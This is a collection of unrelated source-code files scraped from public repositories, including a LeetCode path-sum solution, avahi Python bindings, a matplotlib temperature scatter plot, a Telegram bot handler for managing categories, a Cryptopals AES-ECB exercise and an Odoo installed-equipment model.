def test_is_leap(self):
for f in self.testable_functions:
for case, expected in self.test_cases:
assert expected == f(case)
| TrellixVulnTeam/learning_to_test_code_BL81 | tests/hackerrank/test_isLeapYear.py | test_isLeapYear.py | py | 560 | python | en | code | 0 | github-code | 36 |
36911764017 | import emp,pickle
f=open("emp.dat","wb")
n=int(input("enter the number"))
for i in range(n):
eid=int(input("enter"))
name=input("enter teh name")
sal=float(input("enter the sal"))
e=emp.Emp_class(eid,name,sal)
pickle.dump(e,f)#this will enter the data in emp.dat
# print(type(e))
f.close() | Sahil123git/Python | Pickling/picklse.py | picklse.py | py | 323 | python | en | code | 0 | github-code | 36 |
18036889347 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def pathSum(self, root: Optional[TreeNode], targetSum: int) -> int:
self.result = 0
oldPaths = defaultdict(int)
oldPaths[0] = 1
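        # oldPaths maps each prefix sum (root-to-node path sum) seen on the current DFS path to its count.
        # A downward path ending at the current node adds up to targetSum exactly when
        # currPathSum - targetSum was recorded earlier; the seeded 0 entry covers paths starting at the root.
        # e.g. with prefix sums [10, 15, 18] and targetSum 8, reaching 18 finds 18 - 8 = 10 already seen.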
self.dfs(root, targetSum, 0, oldPaths)
return self.result
def dfs(self, root, targetSum, currPathSum, oldPaths):
# exit condition
        if root is None:
return
currPathSum += root.val
oldPathWanted = currPathSum - targetSum
self.result += oldPaths[oldPathWanted]
oldPaths[currPathSum] = oldPaths[currPathSum] + 1
# dfs children
self.dfs(root.left, targetSum, currPathSum, oldPaths)
self.dfs(root.right, targetSum, currPathSum, oldPaths)
oldPaths[currPathSum] -= 1 | LittleCrazyDog/LeetCode | 437-path-sum-iii/437-path-sum-iii.py | 437-path-sum-iii.py | py | 974 | python | en | code | 2 | github-code | 36 |
37351904509 | # This file is part of avahi.
#
# avahi is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# avahi is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with avahi; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA.
# Some definitions matching those in avahi-common/defs.h
import dbus
SERVER_INVALID, SERVER_REGISTERING, SERVER_RUNNING, SERVER_COLLISION, SERVER_FAILURE = range(0, 5)
ENTRY_GROUP_UNCOMMITED, ENTRY_GROUP_REGISTERING, ENTRY_GROUP_ESTABLISHED, ENTRY_GROUP_COLLISION, ENTRY_GROUP_FAILURE = range(0, 5)
DOMAIN_BROWSER_BROWSE, DOMAIN_BROWSER_BROWSE_DEFAULT, DOMAIN_BROWSER_REGISTER, DOMAIN_BROWSER_REGISTER_DEFAULT, DOMAIN_BROWSER_BROWSE_LEGACY = range(0, 5)
PROTO_UNSPEC, PROTO_INET, PROTO_INET6 = -1, 0, 1
IF_UNSPEC = -1
PUBLISH_UNIQUE = 1
PUBLISH_NO_PROBE = 2
PUBLISH_NO_ANNOUNCE = 4
PUBLISH_ALLOW_MULTIPLE = 8
PUBLISH_NO_REVERSE = 16
PUBLISH_NO_COOKIE = 32
PUBLISH_UPDATE = 64
PUBLISH_USE_WIDE_AREA = 128
PUBLISH_USE_MULTICAST = 256
LOOKUP_USE_WIDE_AREA = 1
LOOKUP_USE_MULTICAST = 2
LOOKUP_NO_TXT = 4
LOOKUP_NO_ADDRESS = 8
LOOKUP_RESULT_CACHED = 1
LOOKUP_RESULT_WIDE_AREA = 2
LOOKUP_RESULT_MULTICAST = 4
LOOKUP_RESULT_LOCAL = 8
LOOKUP_RESULT_OUR_OWN = 16
LOOKUP_RESULT_STATIC = 32
SERVICE_COOKIE = "org.freedesktop.Avahi.cookie"
SERVICE_COOKIE_INVALID = 0
DBUS_NAME = "org.freedesktop.Avahi"
DBUS_INTERFACE_SERVER = DBUS_NAME + ".Server"
DBUS_PATH_SERVER = "/"
DBUS_INTERFACE_ENTRY_GROUP = DBUS_NAME + ".EntryGroup"
DBUS_INTERFACE_DOMAIN_BROWSER = DBUS_NAME + ".DomainBrowser"
DBUS_INTERFACE_SERVICE_TYPE_BROWSER = DBUS_NAME + ".ServiceTypeBrowser"
DBUS_INTERFACE_SERVICE_BROWSER = DBUS_NAME + ".ServiceBrowser"
DBUS_INTERFACE_ADDRESS_RESOLVER = DBUS_NAME + ".AddressResolver"
DBUS_INTERFACE_HOST_NAME_RESOLVER = DBUS_NAME + ".HostNameResolver"
DBUS_INTERFACE_SERVICE_RESOLVER = DBUS_NAME + ".ServiceResolver"
DBUS_INTERFACE_RECORD_BROWSER = DBUS_NAME + ".RecordBrowser"
def byte_array_to_string(s):
r = ""
for c in s:
if c >= 32 and c < 127:
r += "%c" % c
else:
r += "."
return r
def txt_array_to_string_array(t):
l = []
for s in t:
l.append(byte_array_to_string(s))
return l
def string_to_byte_array(s):
r = []
for c in s:
r.append(dbus.Byte(ord(c)))
return r
def string_array_to_txt_array(t):
l = []
for s in t:
l.append(string_to_byte_array(s))
return l
def dict_to_txt_array(txt_dict):
l = []
for k,v in txt_dict.items():
l.append(string_to_byte_array("%s=%s" % (k,v)))
return l
| RMerl/asuswrt-merlin | release/src/router/avahi-0.6.31/avahi-python/avahi/__init__.py | __init__.py | py | 3,082 | python | en | code | 6,715 | github-code | 36 |
28888308996 | '''
https://www.codewars.com/kata/52efefcbcdf57161d4000091/
The main idea is to count all the occurring characters in a string. If you have a string like aba, then the result should be {'a': 2, 'b': 1}.
What if the string is empty? Then the result should be empty object literal, {}.
'''
# my solution
def count(str):
dict = {}
for i in str:
if i in dict:
dict[i] += 1
else:
dict[i] = 1
return dict
#! alternative-solution
from collections import Counter
def count(string):
return Counter(string)
# I've been seeing Counter() all around lately, and it feels like the more
# Pythonic way to build this kind of key-value count
41068976001 | from matplotlib import pyplot as plt
from matplotlib import font_manager
# set up Chinese font support
# NOTE: this font path points to a font on the author's machine; swap in any Chinese font path available on your system (Windows/macOS/Linux)
my_font = font_manager.FontProperties(
    fname=r'C:\Windows\Fonts\STFANGSO.TTF')
# set the figure size
plt.figure(figsize=(20, 8), dpi=80)
# data
x_3 = range(1, 32)
x_10 = range(51, 82)
y_1 = [11, 17, 16, 11, 12, 11, 12, 6, 6, 7, 8, 9, 12, 15, 14, 17, 18,
       21, 16, 17, 20, 14, 15, 15, 15, 19, 21, 22, 22, 22, 23]  # March
y_2 = [26, 26, 28, 19, 21, 17, 16, 19, 18, 20, 20, 19, 22, 23, 17, 20,
       21, 20, 22, 15, 11, 15, 5, 13, 17, 10, 11, 13, 12, 13, 6]  # October
# set the axis ticks
_x = list(x_3)+list(x_10)  # concatenate both x ranges into one list; the gap in the middle keeps ticks aligned with the data points
_xticks_ = ['3月{}日'.format(i) for i in range(1, 32)]
_xticks_ += ['10月{}日'.format(i) for i in range(1, 32)]
plt.xticks(_x[::3], _xticks_[::3], fontproperties=my_font,
           rotation=45)  # _xticks_ maps one-to-one onto _x; slice with a step when the ticks get too dense
# label the axes
plt.xlabel("时间", fontproperties=my_font)
plt.ylabel("温度(℃)", fontproperties=my_font)
plt.title("3月和10月温度比较图", fontproperties=my_font)
# draw the scatter plots
plt.scatter(x_3, y_1, label="3月", color='r')
plt.scatter(x_10, y_2, label="10月")
# add the legend; it must come after the plotting calls!
plt.legend(prop=my_font, loc='upper left')
# show the figure
plt.show() | XiongZhouR/python-of-learning | matplotlib/scatter.py | scatter.py | py | 1,563 | python | zh | code | 1 | github-code | 36 |
35862373343 | import logging
import time
from aiogram import F, Router
from aiogram.fsm.context import FSMContext
from aiogram.types import CallbackQuery, InlineKeyboardMarkup, Message
from sqlalchemy.orm import Session
from keyboards.keyboards import (
back_keyboard,
pagination_keyboard,
yes_no_keyboard,
)
from keyboards.methodist_keyboards import (
add_category_keyboard,
category_keyboard_methodist,
confirm_category_keyboard,
edit_category_keyboard,
methodist_profile_keyboard,
)
from lexicon.lexicon import BUTTONS, LEXICON
from utils.db_commands import (
category_deleting,
create_category,
get_all_categories,
select_user,
set_category_param,
)
from utils.pagination import PAGE_SIZE
from utils.states_form import AddCategory, CategoryList, EditCategory
from utils.utils import generate_categories_list, get_category_info
logger = logging.getLogger(__name__)
methodist_category_router = Router()
# Handlers for adding a category
@methodist_category_router.message(
F.text.in_(
[
BUTTONS["RU"]["add_category"],
BUTTONS["TT"]["add_category"],
BUTTONS["EN"]["add_category"],
]
)
)
async def add_category(message: Message, session: Session):
"""Обработчик кнопки Добавить категорию."""
try:
user = select_user(session, message.from_user.id)
language = user.language
lexicon = LEXICON[language]
await message.answer(
lexicon["add_category"],
reply_markup=add_category_keyboard(language),
)
except KeyError as err:
logger.error(f"Ошибка в ключе при добавлении категории в базу: {err}")
except Exception as err:
logger.error(f"Ошибка при добавлении категории в базу: {err}")
@methodist_category_router.callback_query(F.data == "ready_category")
async def start_add_category(
query: CallbackQuery, state: FSMContext, session: Session
):
"""Начинает сценарий добавления категории в базу."""
try:
await query.answer()
await state.clear()
user = select_user(session, query.from_user.id)
language = user.language
lexicon = LEXICON[language]
await state.update_data(language=language)
await state.set_state(AddCategory.name)
await query.message.answer(lexicon["send_category_name"])
await query.message.delete()
except KeyError as err:
logger.error(f"Ошибка в ключе при запросе названия категории: {err}")
except Exception as err:
logger.error(f"Ошибка при запросе названия категории: {err}")
@methodist_category_router.message(AddCategory.name)
async def process_add_category_name(
message: Message, state: FSMContext, session: Session
):
"""Обработчик принимает имя категории, сохраняет категорию в БД.
Просит прислать сообщение.
Отправляет собранные данные для подтверждения корректности
или для перехода к редактированию.
"""
try:
data = await state.get_data()
await state.clear()
language = data["language"]
lexicon = LEXICON[language]
data["name"] = message.text
category_created = create_category(session, data)
if not category_created:
await message.answer(
lexicon["error_adding_category"],
reply_markup=methodist_profile_keyboard(language),
)
return
category_info = get_category_info(data["name"], lexicon, session)
info = category_info["info"]
category_id = category_info["id"]
        # Build pagination for the category list in case the user
        # goes on to edit the newly created category
categories = get_all_categories(session)
page_info = generate_categories_list(
categories=categories,
lexicon=lexicon,
current_page=0,
page_size=PAGE_SIZE,
)
categories_ids = page_info["categories_ids"]
new_current_page = page_info["current_page"]
query_id = None
for key in categories_ids.keys():
            if categories_ids[key] == category_id:
query_id = key
await state.set_state(EditCategory.confirm_task)
await state.update_data(
category_id=category_id,
query_id=query_id,
current_page=new_current_page,
task_info=page_info,
language=language,
)
        # Tell the user we are about to show the result
await message.answer(lexicon["confirm_adding_category"])
time.sleep(2)
        # Show the result
await message.answer(
info, reply_markup=confirm_category_keyboard(language)
)
except KeyError as err:
logger.error(
f"Ошибка в ключе при запросе подтверждения категории: {err}"
)
except Exception as err:
logger.error(f"Ошибка при запросе подтверждения категории: {err}")
@methodist_category_router.callback_query(F.data == "edit_category")
async def process_edit_category(query: CallbackQuery, state: FSMContext):
"""Обарботчик инлайн кнопки Редактировать категорию.
Начинает сценарий внесения изменений в базу.
"""
try:
await query.answer()
data = await state.get_data()
language = data["language"]
query_id = data["query_id"]
lexicon = LEXICON[language]
await query.message.answer(
lexicon["start_edit_category"],
reply_markup=edit_category_keyboard(language, cd=query_id),
)
await query.message.delete()
except KeyError as err:
logger.error(
f"Ошибка в ключе при начале редактирования категории: {err}"
)
except Exception as err:
logger.error(f"Ошибка при начале редактирования категории: {err}")
@methodist_category_router.callback_query(F.data == "edit_category_name")
async def edit_category_name(query: CallbackQuery, state: FSMContext):
"""Обработчик создает состояние для смены названия категории.
Просит прислать сообщение.
"""
try:
await query.answer()
data = await state.get_data()
await state.set_state(EditCategory.name)
language = data["language"]
lexicon = LEXICON[language]
await query.message.answer(lexicon["edit_category_name"])
await query.message.delete()
except KeyError as err:
logger.error(
"Ошибка в ключевом слове при запросе нового "
f"названия категории: {err}"
)
except Exception as err:
logger.error(f"Ошибка при запросе нового названия категории: {err}")
@methodist_category_router.message(EditCategory.name)
async def process_edit_name(
message: Message, state: FSMContext, session: Session
):
"""Обрабатывает сообщение для изменения названия категории."""
try:
data = await state.get_data()
language = data["language"]
query_id = data["query_id"]
lexicon = LEXICON[language]
category_saved = set_category_param(
session, category_id=data["category_id"], name=message.text
)
if not category_saved:
await message.answer(
lexicon["error_adding_category"],
reply_markup=methodist_profile_keyboard(language),
)
return
await message.answer(
lexicon["category_edited"],
reply_markup=edit_category_keyboard(language, cd=query_id),
)
except KeyError as err:
logger.error(
f"Ошибка в ключевом слове при изменении названия категории: {err}"
)
except Exception as err:
logger.error(f"Ошибка при изменении названия категории: {err}")
@methodist_category_router.callback_query(
F.data.in_({"back_to_category_list", "category:next", "category:previous"})
)
async def show_category_list_callback(query: CallbackQuery, state: FSMContext):
"""Обарботчик кнопки Посмотреть/редактировать категории.
Показывает все созданные категории с пагинацией.
"""
try:
await query.answer()
data = await state.get_data()
categories = data["task_info"]["categories"]
current_page = data["current_page"]
language = data["language"]
lexicon = LEXICON[language]
if query.data == "category:next":
current_page += 1
elif query.data == "category:previous":
current_page -= 1
page_info = generate_categories_list(
categories=categories,
lexicon=lexicon,
current_page=current_page,
page_size=PAGE_SIZE,
methodist=True,
)
msg = page_info["msg"]
first_item = page_info["first_item"]
final_item = page_info["final_item"]
new_current_page = page_info["current_page"]
lk_button = {
"text": BUTTONS[language]["lk"],
"callback_data": "profile",
}
await state.set_state(CategoryList.categories)
await state.update_data(
categories=categories,
current_page=new_current_page,
task_info=page_info,
)
if query.data == "back_to_category_list":
            # Coming back from a category page,
            # so the previous message text cannot be edited in place
await query.message.answer(
msg,
reply_markup=pagination_keyboard(
buttons_count=len(categories),
start=first_item,
end=final_item,
cd="category",
page_size=PAGE_SIZE,
extra_button=lk_button,
),
)
await query.message.delete()
return
await query.message.edit_text(
msg,
reply_markup=pagination_keyboard(
buttons_count=len(categories),
start=first_item,
end=final_item,
cd="category",
page_size=PAGE_SIZE,
extra_button=lk_button,
),
)
except KeyError as err:
logger.error(f"Ошибка в ключе при просмотре списка категорий: {err}")
except Exception as err:
logger.error(f"Ошибка при просмотре списка категорий: {err}")
@methodist_category_router.callback_query(
F.data.startswith("back_to_category:") | F.data.startswith("category:")
)
@methodist_category_router.callback_query(F.data == "no:delete_category")
async def show_category(
query: CallbackQuery, state: FSMContext, session: Session
):
"""Обработчик кнопок выбора отдельной категории.
Получаем условный id категории из callback_data, достаем реальный id из
состояние Data и получаем полную инфу о категории из базы данных.
"""
try:
await query.answer()
data = await state.get_data()
if not data:
user = select_user(session, query.from_user.id)
await query.message.answer(
LEXICON[user.language]["error_getting_category"],
reply_markup=InlineKeyboardMarkup(
inline_keyboard=category_keyboard_methodist(user.language)
),
)
return
language = data["language"]
lexicon = LEXICON[language]
        # Get the category id from the state and query the database
if "category_id" in data:
category_id = data["category_id"]
elif ("category_ids" in data) and query.data.startswith("category:"):
category_ids = int(query.data.split(":")[-1])
category_id = data["category_ids"][category_ids]
elif ("categories_ids" in data) and query.data.startswith("category:"):
category_ids = int(query.data.split(":")[-1])
category_id = data["categories_ids"][category_ids]
category_info = get_category_info(category_id, lexicon, session)
info = category_info["info"]
msg = f"{lexicon['category_chosen']}\n\n" f"{info}\n\n"
await state.set_state(EditCategory.category_id)
await state.update_data(category_id=category_id, query_id=category_id)
await query.message.answer(
msg, reply_markup=category_keyboard_methodist(language)
)
await query.message.delete()
except KeyError as err:
logger.error(f"Ошибка в ключевом слове при получении категории: {err}")
except Exception as err:
logger.error(f"Ошибка при получении категории: {err}")
@methodist_category_router.callback_query(
EditCategory.confirm_task, F.data == "confirm"
)
async def process_saving_category_to_db(
query: CallbackQuery, state: FSMContext
):
"""Обработчик кнопки Подтверждаю."""
try:
await query.answer()
data = await state.get_data()
await state.clear()
language = data["language"]
lexicon = LEXICON[language]
await query.message.answer(
lexicon["category_added"],
reply_markup=methodist_profile_keyboard(language),
)
await query.message.delete()
except KeyError as err:
logger.error(f"Ошибка в ключе при добавлении категории: {err}")
except Exception as err:
logger.error(f"Ошибка при добавлении категории: {err}")
@methodist_category_router.message(
F.text.in_(
[
BUTTONS["RU"]["category_list"],
BUTTONS["TT"]["category_list"],
BUTTONS["EN"]["category_list"],
]
)
)
async def show_category_list(
message: Message, state: FSMContext, session: Session
):
"""Обарботчик кнопки Посмотреть/редактировать категории.
Показывает все созданные категории с пагинацией.
"""
try:
await state.clear()
user = select_user(session, message.from_user.id)
language = user.language
lexicon = LEXICON[language]
categories = get_all_categories(session)
if not categories:
await message.answer(
lexicon["no_categories_yet"],
reply_markup=add_category_keyboard(language),
)
return
current_page = 1
page_info = generate_categories_list(
categories=categories,
lexicon=lexicon,
current_page=current_page,
page_size=PAGE_SIZE,
methodist=True,
)
msg = page_info["msg"]
category_ids = page_info["categories_ids"]
first_item = page_info["first_item"]
final_item = page_info["final_item"]
lk_button = {
"text": BUTTONS[language]["lk"],
"callback_data": "profile",
}
await state.set_state(CategoryList.categories)
await state.update_data(
categories=categories,
category_ids=category_ids,
current_page=current_page,
task_info=page_info,
language=language,
)
await message.answer(
msg,
reply_markup=pagination_keyboard(
buttons_count=len(categories),
start=first_item,
end=final_item,
cd="category",
page_size=PAGE_SIZE,
extra_button=lk_button,
),
)
except KeyError as err:
logger.error(f"Ошибка в ключе при просмотре списка категорий: {err}")
except Exception as err:
logger.error(f"Ошибка при просмотре списка категорий: {err}")
@methodist_category_router.callback_query(F.data == "delete_category")
async def delete_category(
query: CallbackQuery, state: FSMContext, session: Session
):
"""Кнопка "Удалить" в разделе редактирования категории."""
try:
await query.answer()
data = await state.get_data()
language = data["language"]
lexicon = LEXICON[language]
await query.message.edit_text(
lexicon["delete_confirmation"],
reply_markup=yes_no_keyboard(
language, "delete_category", "delete_category"
),
)
except Exception as err:
logger.error(f"Ошибка при получении категории: {err}")
@methodist_category_router.callback_query(F.data == "yes:delete_category")
async def category_deletion_confirmation(
query: CallbackQuery, state: FSMContext, session: Session
):
"""Подтверждение удаления категории."""
try:
await query.answer()
data = await state.get_data()
language = data["language"]
lexicon = LEXICON[language]
category_id = data["category_id"]
await category_deleting(session, category_id)
categories = get_all_categories(session)
if not categories:
await query.message.edit_text(
lexicon["no_categories_yet"],
reply_markup=add_category_keyboard(language),
)
return
page_info = generate_categories_list(
categories=categories,
lexicon=lexicon,
page_size=PAGE_SIZE,
methodist=True,
)
category_ids = page_info["categories_ids"]
await state.set_data({})
await state.update_data(
categories=categories,
category_ids=category_ids,
task_info=page_info,
language=language,
current_page=1,
)
await query.message.edit_text(
lexicon["category_deleting"],
reply_markup=back_keyboard(
language, "back_to_category_list", "back_to_category_list"
),
)
except Exception as err:
logger.error(f"Ошибка при удалении категории: {err}")
| Studio-Yandex-Practicum/EdGame_bot | handlers/methodist_categories_handlers.py | methodist_categories_handlers.py | py | 19,739 | python | ru | code | 0 | github-code | 36 |
22968912977 | from fastapi import APIRouter, Depends, Request
from sqlalchemy.orm import Session
from components.auth.logics import AuthLogic
from config.settings import get_db
from framework.api_response import ApiResponse
from framework.decorators import default_api_response, classview
from components.auth.schemas import (
LoginRequestSchema, LoginResponseSchema
)
router = APIRouter(prefix="/auth")
@classview(router)
class LoginView:
session: Session = Depends(get_db)
@router.post("/login")
@default_api_response
async def login(self, request: Request,
login: LoginRequestSchema):
return ApiResponse(
request=request,
request_schema=LoginRequestSchema,
response_schema=LoginResponseSchema,
method=AuthLogic(self.session).login,
body=login
)
| minhhh-0927/cookiecutter-fastapi-sun-asterisk | {{cookiecutter.project_slug}}/components/auth/routers.py | routers.py | py | 857 | python | en | code | 13 | github-code | 36 |
26755841181 | from Crypto.Cipher import AES
from base64 import b64decode
import os
def main():
key = 'YELLOW SUBMARINE'
cipher = AES.new(key, AES.MODE_ECB)
file_path = os.path.expanduser('~/Downloads/7.txt')
with open(file_path, 'r') as f:
data = f.read()
data = b64decode(data)
msg = cipher.decrypt(data).decode('utf-8')
print(msg)
if __name__ == "__main__":
main()
| dominicle8/cryptopals | 1_7.py | 1_7.py | py | 398 | python | en | code | 0 | github-code | 36 |
8756260225 | # License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
# -*- coding: utf-8 -*-
from odoo import models, fields, api
from odoo.addons.of_geolocalize.models.of_geo import GEO_PRECISION
class OFParcInstalle(models.Model):
_name = 'of.parc.installe'
_description = u"Parc installé"
name = fields.Char(string=u"No de série", size=64, required=False, copy=False)
date_service = fields.Date(string=u"Date vente", required=False)
date_installation = fields.Date(string=u"Date d'installation", required=False)
date_fin_garantie = fields.Date(string=u"Fin de garantie")
type_garantie = fields.Selection(selection=[
('initial', u"Initiale"),
('extension', u"Extension"),
('expired', u"Expirée")], string=u"Type de garantie")
product_id = fields.Many2one(comodel_name='product.product', string=u"Produit", required=True, ondelete='restrict')
product_category_id = fields.Many2one(comodel_name='product.category', string=u"Catégorie")
client_id = fields.Many2one(
comodel_name='res.partner', string=u"Client", required=True, domain="[('parent_id','=',False)]",
ondelete='restrict')
client_name = fields.Char(related='client_id.name') # for map view
client_mobile = fields.Char(related='client_id.mobile') # for map view
site_adresse_id = fields.Many2one(
comodel_name='res.partner', string=u"Site installation", required=False,
domain="['|',('parent_id','=',client_id),('id','=',client_id)]", ondelete='restrict')
revendeur_id = fields.Many2one(
comodel_name='res.partner', string=u"Revendeur", required=False, ondelete='restrict')
installateur_id = fields.Many2one(
comodel_name='res.partner', string=u"Installateur", required=False, ondelete='restrict')
installateur_adresse_id = fields.Many2one(
comodel_name='res.partner', string=u"Adresse installateur", required=False,
domain="['|',('parent_id','=',installateur_id),('id','=',installateur_id)]", ondelete='restrict')
note = fields.Text(string="Note")
tel_site_id = fields.Char(string=u"Téléphone site installation", related='site_adresse_id.phone', readonly=True)
street_site_id = fields.Char(string=u"Adresse", related='site_adresse_id.street', readonly=True)
street2_site_id = fields.Char(string=u"Complément adresse", related='site_adresse_id.street2', readonly=True)
zip_site_id = fields.Char(string=u"Code postal", related='site_adresse_id.zip', readonly=True, store=True)
city_site_id = fields.Char(string=u"Ville", related='site_adresse_id.city', readonly=True)
country_site_id = fields.Many2one(
comodel_name='res.country', string=u"Pays", related='site_adresse_id.country_id', readonly=True)
no_piece = fields.Char(string=u"N° pièce", size=64, required=False)
project_issue_ids = fields.One2many(
comodel_name='project.issue', inverse_name='of_produit_installe_id', string=u"SAV")
active = fields.Boolean(string=u"Actif", default=True)
brand_id = fields.Many2one(comodel_name='of.product.brand', string=u"Marque")
modele = fields.Char(string=u"Modèle")
installation = fields.Char(string=u"Type d'installation")
conforme = fields.Boolean(string=u"Conforme", default=True)
state = fields.Selection(
selection=[
('neuf', "Neuf"),
('bon', "Bon"),
('usage', u"Usagé"),
('remplacer', u"À remplacer"),
], string=u"État", default="neuf")
sale_order_ids = fields.Many2many(comodel_name='sale.order', string=u"Commandes")
sale_order_amount = fields.Float(compute='_compute_links')
account_invoice_ids = fields.Many2many(comodel_name='account.invoice', string=u"Factures")
account_invoice_amount = fields.Float(compute='_compute_links')
    # Fields added for the map view
geo_lat = fields.Float(string="geo_lat", compute='_compute_geo', store=True)
geo_lng = fields.Float(string="geo_lng", compute='_compute_geo', store=True)
precision = fields.Selection(
GEO_PRECISION, default='not_tried', string="precision", compute='_compute_geo', store=True,
help=u"Niveau de précision de la géolocalisation.\n"
u"bas: à la ville.\n"
u"moyen: au village\n"
u"haut: à la rue / au voisinage\n"
u"très haut: au numéro de rue\n")
lot_id = fields.Many2one(comodel_name='stock.production.lot', string="Lot d'origine")
technician_id = fields.Many2one(comodel_name='hr.employee', string=u"Technicien")
# @api.depends
@api.depends('sale_order_ids', 'account_invoice_ids')
def _compute_links(self):
for parc in self:
parc.sale_order_amount = len(parc.sale_order_ids)
parc.account_invoice_amount = len(parc.account_invoice_ids)
@api.multi
@api.depends('client_id', 'client_id.geo_lat', 'client_id.geo_lng', 'client_id.precision',
'site_adresse_id', 'site_adresse_id.geo_lat', 'site_adresse_id.geo_lng', 'site_adresse_id.precision')
def _compute_geo(self):
for produit_installe in self:
if produit_installe.site_adresse_id:
produit_installe.geo_lat = produit_installe.site_adresse_id.geo_lat
produit_installe.geo_lng = produit_installe.site_adresse_id.geo_lng
produit_installe.precision = produit_installe.site_adresse_id.precision
else:
produit_installe.geo_lat = produit_installe.client_id.geo_lat
produit_installe.geo_lng = produit_installe.client_id.geo_lng
produit_installe.precision = produit_installe.client_id.precision
# @api.onchange
@api.onchange('date_fin_garantie')
def onchange_date_fin_garantie(self):
if self.date_fin_garantie and self.date_fin_garantie < fields.Date.today():
self.type_garantie = 'expired'
elif self.date_fin_garantie and self.date_fin_garantie >= fields.Date.today() and \
self.type_garantie == 'expired':
self.type_garantie = 'extension'
@api.onchange('product_id')
def onchange_product_id(self):
if self.product_id:
self.brand_id = self.product_id.brand_id
self.product_category_id = self.product_id.categ_id
@api.onchange('client_id')
def _onchange_client_id(self):
self.ensure_one()
if self.client_id:
self.site_adresse_id = self.client_id
    # Inherited methods
@api.model
def create(self, vals):
parc = super(OFParcInstalle, self).create(vals)
if parc.revendeur_id and not parc.revendeur_id.of_revendeur:
parc.revendeur_id.of_revendeur = True
if parc.installateur_id and not parc.installateur_id.of_installateur:
parc.installateur_id.of_installateur = True
return parc
@api.multi
def write(self, vals):
res = super(OFParcInstalle, self).write(vals)
if vals.get('revendeur_id'):
non_revendeurs = self.mapped('revendeur_id').filtered(lambda p: not p.of_revendeur)
non_revendeurs.write({'of_revendeur': True})
if vals.get('installateur_id'):
non_installateurs = self.mapped('installateur_id').filtered(lambda p: not p.of_installateur)
non_installateurs.write({'of_installateur': True})
return res
@api.multi
def name_get(self):
"""
Permet dans un SAV lors de la saisie du no de série d'une machine installée de proposer les machines
du contact précédées d'une puce.
Permet dans une DI de proposer les appareils d'une adresse différente entre parenthèses.
"""
if self._context.get('simple_display'):
return super(OFParcInstalle, self).name_get()
result = []
client_id = self._context.get('partner_id_no_serie_puce')
if client_id:
for record in self:
result.append((
record.id,
("-> " if record.client_id.id == client_id else "")
+ (record.name or u"(N° non renseigné)")
+ " - " + record.client_id.display_name))
return result
for record in self:
serial_number = '%s - ' % record.name if record.name else ''
product_name = record.product_id.name
partner_name = record.client_id.display_name
record_name = '%s%s - %s' % (
serial_number,
product_name,
partner_name,
)
result.append((record.id, record_name))
return result
@api.model
def name_search(self, name='', args=None, operator='ilike', limit=100):
"""
Permet dans un SAV lors de la saisie du no de série d'une machine installée de proposer les machines
du contact en premier précédées d'une puce.
Permet, dans une DI, de montrer en 1er les appareils de l'adresse, puis ceux du client et enfin les autres."""
if self._context.get('partner_id_no_serie_puce'):
client_id = self._context.get('partner_id_no_serie_puce')
res = super(OFParcInstalle, self).name_search(name, [('client_id', '=', client_id)], operator, limit) or []
limit = limit - len(res)
res = [(parc[0], "-> " + parc[1]) for parc in res]
res += super(OFParcInstalle, self).name_search(
name, [('client_id', '!=', client_id)], operator, limit) or []
return res
if self._context.get('address_prio_id'):
address_id = self._context.get('address_prio_id')
args = args or []
res = super(OFParcInstalle, self).name_search(
name,
args + [['site_adresse_id', '=', address_id]],
operator,
limit) or []
limit = limit - len(res)
res += super(OFParcInstalle, self).name_search(
name,
args + ['|', ['site_adresse_id', '=', False], ['site_adresse_id', '!=', address_id],
['client_id', '=', address_id]],
operator,
limit) or []
limit = limit - len(res)
res += super(OFParcInstalle, self).name_search(
name,
args + ['|', ['site_adresse_id', '=', False], ['site_adresse_id', '!=', address_id],
['client_id', '!=', address_id]],
operator,
limit) or []
return res
return super(OFParcInstalle, self).name_search(name, args, operator, limit)
# Actions
@api.multi
def action_view_orders(self):
action = self.env.ref('sale.action_quotations').read()[0]
action['domain'] = [('id', 'in', self.sale_order_ids._ids)]
action['context'] = {
'default_of_parc_installe_ids': [(6, 0, self.ids)],
'default_partner_id': len(self) == 1 and self.client_id.id or False,
}
return action
@api.multi
def action_view_invoices(self):
action = self.env.ref('account.action_invoice_tree1').read()[0]
action['domain'] = [('id', 'in', self.account_invoice_ids._ids)]
return action
@api.model
def action_creer_sav(self):
res = {
'name': 'SAV',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'project.issue',
'type': 'ir.actions.act_window',
'target': 'current',
}
active_ids = self._context.get('active_ids')
if active_ids:
parc_installe = self.browse(active_ids[0])
if parc_installe.client_id:
res['context'] = {'default_partner_id': parc_installe.client_id.id,
'default_of_produit_installe_id': parc_installe.id,
'default_of_type': 'di'}
return res
    # Other
@api.model
def recompute_type_garantie_daily(self):
today = fields.Date.today()
all_parc_date_garantie = self.search([('date_fin_garantie', '!=', False)])
        # initialise the warranty state for installed products whose warranty end date is still in the future
parc_garantie = all_parc_date_garantie.filtered(lambda p: p.date_fin_garantie >= today and not p.type_garantie)
parc_garantie.write({'type_garantie': 'initial'})
        # Switch the warranty state to "Expired" for installed products whose warranty end date has passed
parc_expire = all_parc_date_garantie.filtered(
lambda p: p.date_fin_garantie < today and p.type_garantie != 'expired')
parc_expire.write({'type_garantie': 'expired'})
| odof/openfire | of_parc_installe/models/of_parc_installe.py | of_parc_installe.py | py | 12,772 | python | fr | code | 3 | github-code | 36 |
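A hedged sketch of how the two context keys handled by name_search above might be exercised from an Odoo shell. The model's technical name ('of.parc.installe') and the partner id used here are assumptions for illustration, not values confirmed by this file.

# Hedged sketch (Odoo shell); 'of.parc.installe' and partner id 42 are assumptions.
Parc = env['of.parc.installe']
# SAV flow: the partner's own machines are listed first, prefixed with "-> ".
Parc.with_context(partner_id_no_serie_puce=42).name_search('')
# DI flow: devices installed at the given address come first, then the client's, then the rest.
Parc.with_context(address_prio_id=42).name_search('')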
3118375238 | import torch.optim as optim
ADADELTA_LEARNING_RATE = 0.05
